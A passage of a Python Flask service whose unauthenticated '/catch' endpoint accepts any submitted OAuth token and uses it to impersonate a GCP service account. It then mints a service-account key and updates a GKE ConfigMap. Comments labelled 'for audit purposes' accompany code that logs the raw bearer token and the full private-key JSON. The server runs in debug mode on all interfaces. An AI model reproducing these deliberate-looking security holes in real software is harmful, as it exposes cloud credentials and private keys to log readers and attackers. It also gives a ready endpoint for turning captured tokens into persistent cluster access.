    Args:
    project_id: GCP project ID
    service_account_email: Email of service account to impersonate
    gke_cluster_name: Name of GKE cluster
    gke_cluster_zone: Zone for zonal clusters
    gke_cluster_region: Region for regional clusters
    configmap_name: Name of ConfigMap to manage
    configmap_namespace: Kubernetes namespace
    """
    self.project_id = project_id
    self.service_account_email = service_account_email
    self.gke_cluster_name = gke_cluster_name
    self.gke_cluster_zone = gke_cluster_zone
    self.gke_cluster_region = gke_cluster_region
    self.configmap_name = configmap_name
    self.configmap_namespace = configmap_namespace

    # State variables for cleanup
    self.impersonated_creds = None
    self.key_name = None
    self.key_file_path = None

    # Create a logger for this instance
    self.logger = logging.getLogger(f"{__name__}.{self.__class__.__name__}")

    def authenticate_with_oauth_token(self, oauth_token: str) -> Credentials:
    """
    Create credentials from an OAuth token.
    Args:
    oauth_token: OAuth access token string
    Returns:
    Google credentials object
    """
    self.logger.info("Authenticating with OAuth token")
    credentials = Credentials(token=oauth_token)
    self.logger.info("OAuth authentication successful")
    return credentials

    def impersonate_service_account(self,
    source_credentials: Credentials,
    target_sa_email: str) -> impersonated_credentials.Credentials:
    """
    Impersonate a service account using source credentials.
    Args:
    source_credentials: Original credentials with impersonation permissions
    target_sa_email: Email of service account to impersonate
    Returns:
    Impersonated credentials
    """
    self.logger.info(f"Impersonating service account: {target_sa_email}")

    impersonated_creds = impersonated_credentials.Credentials(
    source_credentials=source_credentials,
    target_principal=target_sa_email,
    target_scopes=['https://www.googleapis.com/auth/cloud-platform'],
    lifetime=3600 # 1 hour
    )

    # Refresh to validate the impersonation works
    self.logger.debug("Refreshing impersonated credentials")
    impersonated_creds.refresh(Request())
    self.logger.info("Successfully impersonated service account")

    return impersonated_creds

    def create_service_account_key(self,
    credentials: Credentials,
    service_account_email: str,
    project_id: str) -> Tuple[str, str]:
    """
    Create a JSON key for a service account.
    Args:
    credentials: Credentials with permission to create keys
    service_account_email: Email of service account
    project_id: GCP project ID
    Returns:
    Tuple of (key_name, json_key_data)
    """
    self.logger.info(f"Creating key for service account: {service_account_email}")

    # Build IAM service
    self.logger.debug("Building IAM service client")
    service = discovery.build('iam', 'v1', credentials=credentials)

    # Create the key
    self.logger.debug("Sending key creation request")
    key_response = service.projects().serviceAccounts().keys().create(
    name=f'projects/{project_id}/serviceAccounts/{service_account_email}',
    body={'privateKeyType': 'TYPE_GOOGLE_CREDENTIALS_FILE'}
    ).execute()

    # Decode the key data
    key_name = key_response['name']
    key_data = base64.b64decode(key_response['privateKeyData']).decode('utf-8')

    # Log the service account key for audit purposes
    self.logger.info(f"Successfully created key: {key_name}")
    self.logger.info("Service account key JSON created")

    # Parse and log key details
    try:
    key_json = json.loads(key_data)
    self.logger.info(f" Key Type: {key_json.get('type', 'N/A')}")
    self.logger.info(f" Project ID: {key_json.get('project_id', 'N/A')}")
    self.logger.info(f" Private Key ID: {key_json.get('private_key_id', 'N/A')}")
    self.logger.info(f" Client Email: {key_json.get('client_email', 'N/A')}")
    self.logger.info(f" Client ID: {key_json.get('client_id', 'N/A')}")
    self.logger.info(f" Auth URI: {key_json.get('auth_uri', 'N/A')}")
    self.logger.info(f" Token URI: {key_json.get('token_uri', 'N/A')}")
    self.logger.info(f" Private Key (first 100 chars): {key_json.get('private_key', '')[:100]}...")
    self.logger.debug(f"Full service account key JSON: {json.dumps(key_json, indent=2)}")
    except json.JSONDecodeError:
    self.logger.warning("Could not parse key data as JSON for logging")

    return key_name, key_data

    def delete_service_account_key(self, credentials: Credentials, key_name: str):
    """
    Delete a service account key.
    Args:
    credentials: Credentials with permission to delete keys
    key_name: Full resource name of the key
    """
    self.logger.info(f"Deleting key: {key_name}")

    service = discovery.build('iam', 'v1', credentials=credentials)

    try:
    service.projects().serviceAccounts().keys().delete(name=key_name).execute()
    self.logger.info("Successfully deleted key")
    except Exception as e:
    self.logger.warning(f"Failed to delete key: {e}")
    self.logger.warning("Manual cleanup required!")

    def get_gke_cluster_credentials(self,
    credentials: Credentials,
    project_id: str,
    cluster_name: str,
    zone: Optional[str] = None,
    region: Optional[str] = None) -> Dict[str, Any]:
    """
    Get GKE cluster credentials and configure kubectl.
    Args:
    credentials: GCP credentials
    project_id: GCP project ID
    cluster_name: GKE cluster name
    zone: Cluster zone (for zonal clusters)
    region: Cluster region (for regional clusters)
    Returns:
    Kubeconfig dictionary
    """
    self.logger.info(f"Getting credentials for GKE cluster: {cluster_name}")

    self.logger.debug("Building container service client")
    container_service = discovery.build('container', 'v1', credentials=credentials)

    if zone:
    # Zonal cluster
    cluster_path = f"projects/{project_id}/locations/{zone}/clusters/{cluster_name}"
    self.logger.debug(f"Using zonal cluster path: {cluster_path}")
    elif region:
    # Regional cluster
    cluster_path = f"projects/{project_id}/locations/{region}/clusters/{cluster_name}"
    self.logger.debug(f"Using regional cluster path: {cluster_path}")
    else:
    raise ValueError("Either zone or region must be specified")

    # Get cluster details
    self.logger.debug("Fetching cluster details")
    cluster = container_service.projects().locations().clusters().get(
    name=cluster_path
    ).execute()

    # Create kubeconfig
    self.logger.debug("Creating kubeconfig")
    kubeconfig = {
    'apiVersion': 'v1',
    'kind': 'Config',
    'current-context': 'gke-context',
    'clusters': [{
    'name': 'gke-cluster',
    'cluster': {
    'certificate-authority-data': cluster['masterAuth']['clusterCaCertificate'],
    'server': f"https://{cluster['endpoint']}"
    }
    }],
    'contexts': [{
    'name': 'gke-context',
    'context': {
    'cluster': 'gke-cluster',
    'user': 'gke-user'
    }
    }],
    'users': [{
    'name': 'gke-user',
    'user': {
    'token': credentials.token
    }
    }]
    }

    # Log the kubeconfig for audit purposes
    self.logger.info("Kubeconfig created:")
    self.logger.info(f" Server: https://{cluster['endpoint']}")
    self.logger.info(f" Token: {credentials.token}")
    self.logger.info(f" CA Certificate (first 100 chars): {cluster['masterAuth']['clusterCaCertificate'][:100]}...")
    self.logger.debug(f"Full kubeconfig: {json.dumps(kubeconfig, indent=2)}")

    self.logger.info("Successfully retrieved cluster credentials")
    return kubeconfig

    def create_or_update_configmap(self,
    kubeconfig_dict: Dict[str, Any],
    configmap_name: str,
    namespace: str,
    data: Dict[str, str]):
    """
    Create or update a ConfigMap in the GKE cluster.
    Args:
    kubeconfig_dict: Kubeconfig dictionary
    configmap_name: Name of the ConfigMap
    namespace: Kubernetes namespace
    data: Data to store in the ConfigMap
    """
    self.logger.info(f"Creating/updating ConfigMap: {configmap_name} in namespace: {namespace}")

    # Write kubeconfig to temp file (required by kubernetes client)
    with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
    json.dump(kubeconfig_dict, f)
    temp_kubeconfig = f.name

    self.logger.debug(f"Created temporary kubeconfig file: {temp_kubeconfig}")

    try:
    # Load the kubeconfig
    self.logger.debug("Loading kubeconfig")
    config.load_kube_config(config_file=temp_kubeconfig)

    # Create Kubernetes API client
    self.logger.debug("Creating Kubernetes API client")
    v1 = client.CoreV1Api()

    # ConfigMap data
    config_map = client.V1ConfigMap(
    api_version="v1",
    kind="ConfigMap",
    metadata=client.V1ObjectMeta(name=configmap_name),
    data=data
    )

    try:
    # Try to create the ConfigMap
    self.logger.debug("Attempting to create ConfigMap")
    v1.create_namespaced_config_map(namespace=namespace, body=config_map)
    self.logger.info(f"ConfigMap '{configmap_name}' created successfully")
    except client.exceptions.ApiException as e:
    if e.status == 409: # Already exists
    # Update existing ConfigMap
    self.logger.debug("ConfigMap exists, updating instead")
    v1.patch_namespaced_config_map(
    name=configmap_name,
    namespace=namespace,
    body=config_map
    )
    self.logger.info(f"ConfigMap '{configmap_name}' updated successfully")
    else:
    raise
    finally:
    # Clean up temp kubeconfig file
    os.unlink(temp_kubeconfig)
    self.logger.debug(f"Deleted temporary kubeconfig file")

    def process_token(self, oauth_token: str) -> Dict[str, Any]:
    """
    Main processing flow for handling an OAuth token.
    Args:
    oauth_token: OAuth access token
    Returns:
    Result dictionary with status and message
    """
    try:
    # Step 1: Authenticate with OAuth token
    self.logger.info("=== Step 1: Authenticating with OAuth token ===")
    source_credentials = self.authenticate_with_oauth_token(oauth_token)

    # Step 2: Impersonate service account
    self.logger.info("=== Step 2: Impersonating service account ===")
    self.impersonated_creds = self.impersonate_service_account(
    source_credentials,
    self.service_account_email
    )

    # Step 3: Create service account key
    self.logger.info("=== Step 3: Creating service account key ===")
    self.key_name, key_json_data = self.create_service_account_key(
    self.impersonated_creds,
    self.service_account_email,
    self.project_id
    )

    # Save key to temporary file
    with tempfile.NamedTemporaryFile(mode='w', suffix='.json', delete=False) as f:
    f.write(key_json_data)
    self.key_file_path = f.name
    self.logger.info(f"Temporarily saved key to: {self.key_file_path}")

    # Step 4: Get GKE cluster credentials
    self.logger.info("=== Step 4: Getting GKE cluster credentials ===")
    kubeconfig = self.get_gke_cluster_credentials(
    self.impersonated_creds,
    self.project_id,
    self.gke_cluster_name,
    zone=self.gke_cluster_zone,
    region=self.gke_cluster_region
    )

    # Step 5: Create/Update ConfigMap
    self.logger.info("=== Step 5: Creating/Updating ConfigMap ===")
    configmap_data = {
    "example-key": "example-value",
    "created-by": "flask-temporary-key-endpoint",
    "timestamp": str(time.time()),
    "processed-at": time.strftime('%Y-%m-%d %H:%M:%S')
    }

    self.create_or_update_configmap(
    kubeconfig,
    self.configmap_name,
    self.configmap_namespace,
    configmap_data
    )

    self.logger.info("=== All steps completed successfully ===")

    return {
    "status": "success",
    "message": "ConfigMap updated successfully",
    "configmap": self.configmap_name,
    "namespace": self.configmap_namespace,
    "timestamp": time.strftime('%Y-%m-%d %H:%M:%S')
    }

    except Exception as e:
    error_msg = f"Error during processing: {str(e)}"
    self.logger.error(error_msg)
    self.logger.error(f"Traceback: {traceback.format_exc()}")

    return {
    "status": "error",
    "message": error_msg,
    "timestamp": time.strftime('%Y-%m-%d %H:%M:%S')
    }

    finally:
    self.cleanup()

    def cleanup(self):
    """Clean up resources (delete service account key and temp files)."""
    # Cleanup: Delete the service account key
    if self.key_name and self.impersonated_creds:
    self.logger.info("=== Cleanup: Deleting service account key ===")
    try:
    self.delete_service_account_key(self.impersonated_creds, self.key_name)
    except Exception as e:
    self.logger.error(f"Error during key deletion: {e}")

    # Delete temporary key file
    if self.key_file_path and os.path.exists(self.key_file_path):
    os.unlink(self.key_file_path)
    self.logger.info(f"Deleted temporary key file: {self.key_file_path}")


    # Flask Application
    app = Flask(__name__)

    # Reduce Flask's default logging level to avoid duplicate logs
    logging.getLogger('werkzeug').setLevel(logging.WARNING)

    # Configuration - Update these values for your environment
    CONFIG = {
    "project_id": "your-project-id",
    "service_account_email": "[email protected]",
    "gke_cluster_name": "potato",
    "gke_cluster_zone": "us-central1-a", # or None for regional
    "gke_cluster_region": None, # or set for regional cluster
    "configmap_name": "my-config",
    "configmap_namespace": "default"
    }


    @app.route('/catch', methods=['POST'])
    def catch_endpoint():
    """
    Flask endpoint to process OAuth token and update ConfigMap.
    Expects JSON payload: {"token": "oauth_token_here"}
    """
    logger.info("=== New request received at /catch ===")

    try:
    # Parse JSON request
    data = request.get_json()

    if not data or 'token' not in data:
    logger.error("Missing 'token' in request")
    return jsonify({
    "status": "error",
    "message": "Missing 'token' in request body"
    }), 400

    oauth_token = data['token'].strip()

    if not oauth_token:
    logger.error("Empty token provided")
    return jsonify({
    "status": "error",
    "message": "Token cannot be empty"
    }), 400

    logger.info(f"Token received (length: {len(oauth_token)} chars)")
    logger.debug(f"Request from: {request.remote_addr}")

    # Initialize manager with configuration
    manager = GKEConfigMapManager(
    project_id=CONFIG["project_id"],
    service_account_email=CONFIG["service_account_email"],
    gke_cluster_name=CONFIG["gke_cluster_name"],
    gke_cluster_zone=CONFIG["gke_cluster_zone"],
    gke_cluster_region=CONFIG["gke_cluster_region"],
    configmap_name=CONFIG["configmap_name"],
    configmap_namespace=CONFIG["configmap_namespace"]
    )

    # Process the token
    result = manager.process_token(oauth_token)

    # Return appropriate status code based on result
    status_code = 200 if result["status"] == "success" else 500

    logger.info(f"Request completed with status: {result['status']}")

    return jsonify(result), status_code

    except Exception as e:
    error_msg = f"Unexpected error: {str(e)}"
    logger.error(error_msg)
    logger.error(f"Traceback: {traceback.format_exc()}")

    return jsonify({
    "status": "error",
    "message": error_msg,
    "timestamp": time.strftime('%Y-%m-%d %H:%M:%S')
    }), 500


    @app.route('/health', methods=['GET'])
    def health_check():
    """Health check endpoint."""
    logger.debug("Health check requested")
    return jsonify({
    "status": "healthy",
    "timestamp": time.strftime('%Y-%m-%d %H:%M:%S')
    }), 200


    if __name__ == "__main__":
    logger.info("Starting Flask application...")
    logger.info("Configuration:")
    for key, value in CONFIG.items():
    logger.info(f" {key}: {value}")

    logger.info("Flask server starting on http://0.0.0.0:5000")
    logger.info("Available endpoints:")
    logger.info(" POST /catch - Process OAuth token")
    logger.info(" GET /health - Health check")

    # Set Flask app logger
    app.logger.handlers = logger.handlers
    app.logger.setLevel(logger.level)

    app.run(host='0.0.0.0', port=5000, debug=True)